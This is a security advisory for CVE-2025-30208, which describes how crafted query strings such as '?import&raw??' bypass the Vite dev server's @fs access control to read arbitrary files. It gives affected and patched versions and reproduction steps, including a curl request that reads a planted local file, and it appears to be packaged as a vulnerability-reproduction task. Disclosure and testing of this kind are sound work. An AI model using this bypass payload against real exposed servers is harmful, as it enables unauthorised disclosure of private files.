# CVE-2025-30208

## Summary

Vite dev server access control can be bypassed using crafted query strings, allowing arbitrary file reads via the @fs handler when the dev server is exposed to the network.

## Description

## Summary
Vite’s dev server `@fs` access control can be bypassed by appending crafted query strings such as `?raw??` or `?import&raw??`, allowing reading arbitrary files outside the allowed serving list when the dev server is exposed to the network.

## Affected Package
- **Name:** vite
- **Ecosystem:** npm
- **Vulnerable versions:** >= 6.2.0 < 6.2.3, >= 6.1.0 < 6.1.2, >= 6.0.0 < 6.0.12, >= 5.0.0 < 5.4.15, < 4.5.10
- **Patched versions:** 6.2.3, 6.1.2, 6.0.12, 5.4.15, 4.5.10

## Details
The Vite dev server uses the `@fs` endpoint to serve files, denying access to paths outside the server’s allow list. However, the implementation removes trailing separators (such as `?`) in multiple places but does not account for them in query-string regex checks. By appending `?raw??` or `?import&raw??` to the URL, an attacker can bypass the `server.fs.deny` restriction and retrieve arbitrary file contents.

**Impact:** Only applications explicitly exposing the Vite dev server to the network (using `--host` or `server.host`) are affected. This enables remote disclosure of local files.

## Reproduction Steps
**Environment setup**
1. Install Node.js (LTS recommended).
2. Create and run a Vite dev server:
   ```bash
   npm create vite@latest
   cd vite-project
   npm install
   npm run dev
   ```
3. Create a file outside the project directory:
   ```bash
   echo "top secret content" > /tmp/secret.txt
   ```

**Steps**
1. Request the file normally (expected denial):
   ```bash
   curl "http://localhost:5173/@fs/tmp/secret.txt"
   ```
2. Request the file with the crafted query string:
   ```bash
   curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw??"
   ```

**Expected vs. vulnerable behavior**
- Expected: server returns 403 “outside of Vite serving allow list.”
- Vulnerable: server returns file contents (e.g., `top secret content`).

## Indicators of Success
- A 403 response for the normal request, and a successful response containing the file contents when using `?import&raw??` (or `?raw??`).

## References
- https://nvd.nist.gov/vuln/detail/CVE-2025-30208
- https://github.com/advisories/GHSA-x574-m823-4x7w
- https://github.com/vitejs/vite/commit/315695e9d97cc6cfa7e6d9e0229fb50cdae3d9f4
- https://github.com/vitejs/vite/commit/80381c38d6f068b12e6e928cd3c616bd1d64803c
- https://github.com/vitejs/vite/commit/807d7f06d33ab49c48a2a3501da3eea1906c0d41
- https://github.com/vitejs/vite/commit/92ca12dc79118bf66f2b32ff81ed09e0d0bd07ca
- https://github.com/vitejs/vite/commit/f234b5744d8b74c95535a7b82cc88ed2144263c1

## Metadata

- Product: npm:vite
- Severity: medium
- Status: open
